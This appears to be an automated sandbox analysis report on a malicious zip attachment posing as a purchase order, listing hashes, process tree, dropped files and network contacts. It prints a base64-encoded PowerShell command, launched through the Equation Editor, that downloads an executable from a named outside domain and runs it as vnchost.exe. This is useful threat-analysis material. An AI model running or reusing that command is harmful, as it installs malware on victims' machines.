File name: | PO #SAI-1007324.zip |
Full analysis: | https://app.any.run/tasks/8392e1a1-7566-48b9-a6f5-531a08ee6e7b |
Verdict: | Malicious activity |
Analysis date: | April 23, 2019, 08:50:26 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | 254E85392E64A880BE29AD4C3F70B450 |
SHA1: | E85891AE5F337F13E05E17DDB183144FB066338C |
SHA256: | 3E35D5001A28D73FCAC209F88E0D5132D1B1BB1045F18D3DDBF9606223B24335 |
SSDEEP: | 24:9A6DXvNQI6tYNimULZGe4xdf7stJCiXkDu60GS:9pXvNwH4XPwipS |
.zip | | | ZIP compressed archive (100) |
---|
ZipRequiredVersion: | 20 |
---|---|
ZipBitFlag: | - |
ZipCompression: | Deflated |
ZipModifyDate: | 2019:04:22 06:30:12 |
ZipCRC: | 0x1796afed |
ZipCompressedSize: | 910 |
ZipUncompressedSize: | 1953 |
ZipFileName: | PO #SAI-1007324.doc |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3872 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\PO #SAI-1007324.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.60.0 | ||||
3972 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rar$DIa3872.45059\PO #SAI-1007324.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WinRAR.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2672 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | svchost.exe | |
User: admin Company: Design Science, Inc. Integrity Level: MEDIUM Description: Microsoft Equation Editor Exit code: 0 Version: 00110900 | ||||
2156 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w 1 -e aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABmAGkAbABlACgAIgBoAHQAdABwADoALwAvAGEAYgBvAHUAdABmAGEAYwBlAGEAdQBkAGkAbwAuAGMAbwBtAC8AZABvAHcAbgBsAGEAbwBkAHMALwBqAGEAbQAvAC4AcABhAHQAaAAvAGoAbwBlAGwALgBlAHgAZQAiACwAIgAkAGUAbgB2ADoAdABlAG0AcABcAHYAbgBjAGgAbwBzAHQALgBlAHgAZQAiACkAKQA7AA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | EQNEDT32.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3560 | cmd /c %temp%\vnchost.exe | C:\Windows\system32\cmd.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3972 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR4C58.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2156 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ONQ5A0WB6FYK8C6KN5DO.temp | — | |
MD5:— | SHA256:— | |||
2672 | EQNEDT32.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@pastebin[1].txt | text | |
MD5:4BCA02BAF1B5D3BD9014B6D4D25DD686 | SHA256:BDD5F8BF96A2A97ACADF2106DD9B252EAE7C7C8FD00A2574F093DAD65652FF5F | |||
2672 | EQNEDT32.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\TqTpj30L[1].txt | html | |
MD5:DC8F82806FB8CD533ECACAEB89390D39 | SHA256:58C753D3D1CE410705C79DF26E3981E9F94DE1F17423BBF2EE8A87B698352CCB | |||
2156 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF | SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5 | |||
2156 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF11abbe.TMP | binary | |
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF | SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5 | |||
3972 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:2DCF80A5356F4143CE5983EA13DAF046 | SHA256:970287722974AE525DF33EA92EF7C144A81C12BFA98E5C46F1614A141D0BC0FF | |||
3972 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Rar$DIa3872.45059\~$ #SAI-1007324.doc | pgc | |
MD5:F170A81F9AB1474218F0B9EEE315A65D | SHA256:9A7995B195CD9C11225D2F645F3FDD855A9A6DFEBCA0829E7FFB076E5EEE8B6F | |||
3872 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DIa3872.45059\PO #SAI-1007324.doc | text | |
MD5:E3644A04429F86CFE06BCCAADD5EE335 | SHA256:7FD1E2DF4029664205FD4F2195630ACE6C871C68A78EA0314B8052F72C1B21AA |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2672 | EQNEDT32.EXE | 104.20.208.21:443 | pastebin.com | Cloudflare Inc | US | shared |
2156 | powershell.exe | 64.111.126.227:80 | aboutfaceaudio.com | New Dream Network, LLC | US | suspicious |
2672 | EQNEDT32.EXE | 104.20.209.21:443 | pastebin.com | Cloudflare Inc | US | shared |
Domain | IP | Reputation |
---|---|---|
pastebin.com |
| shared |
aboutfaceaudio.com |
| unknown |
dns.msftncsi.com |
| shared |